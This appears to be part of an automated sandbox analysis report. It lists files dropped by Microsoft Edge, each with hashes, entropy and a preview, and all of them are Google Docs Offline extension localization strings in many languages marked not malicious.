              SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):838
              Entropy (8bit):4.4975520913636595
              Encrypted:false
              SSDEEP:
              MD5:29A1DA4ACB4C9D04F080BB101E204E93
              SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
              SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
              SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
              Malicious:false
              Reputation:unknown
              Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1305
              Entropy (8bit):4.673517697192589
              Encrypted:false
              SSDEEP:
              MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
              SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
              SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
              SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):911
              Entropy (8bit):4.6294343834070935
              Encrypted:false
              SSDEEP:
              MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
              SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
              SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
              SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):939
              Entropy (8bit):4.451724169062555
              Encrypted:false
              SSDEEP:
              MD5:FCEA43D62605860FFF41BE26BAD80169
              SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
              SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
              SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):977
              Entropy (8bit):4.622066056638277
              Encrypted:false
              SSDEEP:
              MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
              SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
              SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
              SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):972
              Entropy (8bit):4.621319511196614
              Encrypted:false
              SSDEEP:
              MD5:6CAC04BDCC09034981B4AB567B00C296
              SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
              SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
              SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):990
              Entropy (8bit):4.497202347098541
              Encrypted:false
              SSDEEP:
              MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
              SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
              SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
              SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1658
              Entropy (8bit):4.294833932445159
              Encrypted:false
              SSDEEP:
              MD5:BC7E1D09028B085B74CB4E04D8A90814
              SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
              SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
              SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1672
              Entropy (8bit):4.314484457325167
              Encrypted:false
              SSDEEP:
              MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
              SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
              SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
              SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):935
              Entropy (8bit):4.6369398601609735
              Encrypted:false
              SSDEEP:
              MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
              SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
              SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
              SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1065
              Entropy (8bit):4.816501737523951
              Encrypted:false
              SSDEEP:
              MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
              SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
              SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
              SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2771
              Entropy (8bit):3.7629875118570055
              Encrypted:false
              SSDEEP:
              MD5:55DE859AD778E0AA9D950EF505B29DA9
              SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
              SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
              SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
              Malicious:false
              Reputation:unknown
              Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):858
              Entropy (8bit):4.474411340525479
              Encrypted:false
              SSDEEP:
              MD5:34D6EE258AF9429465AE6A078C2FB1F5
              SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
              SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
              SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):954
              Entropy (8bit):4.631887382471946
              Encrypted:false
              SSDEEP:
              MD5:1F565FB1C549B18AF8BBFED8DECD5D94
              SHA1:B57F4BDAE06FF3DFC1EB3E56B6F2F204D6F63638
              SHA-256:E16325D1A641EF7421F2BAFCD6433D53543C89D498DD96419B03CBA60B9C7D60
              SHA-512:A60B8E042A9BCDCC136B87948E9924A0B24D67C6CA9803904B876F162A0AD82B9619F1316BE9FF107DD143B44F7E6F5DF604ABFE00818DEB40A7D62917CDA69F
              Malicious:false
              Reputation:unknown
              Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):899
              Entropy (8bit):4.474743599345443
              Encrypted:false
              SSDEEP:
              MD5:0D82B734EF045D5FE7AA680B6A12E711
              SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
              SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
              SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2230
              Entropy (8bit):3.8239097369647634
              Encrypted:false
              SSDEEP:
              MD5:26B1533C0852EE4661EC1A27BD87D6BF
              SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
              SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
              SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
              Malicious:false
              Reputation:unknown
              Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1160
              Entropy (8bit):5.292894989863142
              Encrypted:false
              SSDEEP:
              MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
              SHA1:4017FC6D8B302335469091B91D063B07C9E12109
              SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
              SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):3264
              Entropy (8bit):3.586016059431306
              Encrypted:false
              SSDEEP:
              MD5:83F81D30913DC4344573D7A58BD20D85
              SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
              SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
              SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
              Malicious:false
              Reputation:unknown
              Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):3235
              Entropy (8bit):3.6081439490236464
              Encrypted:false
              SSDEEP:
              MD5:2D94A58795F7B1E6E43C9656A147AD3C
              SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
              SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
              SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
              Malicious:false
              Reputation:unknown
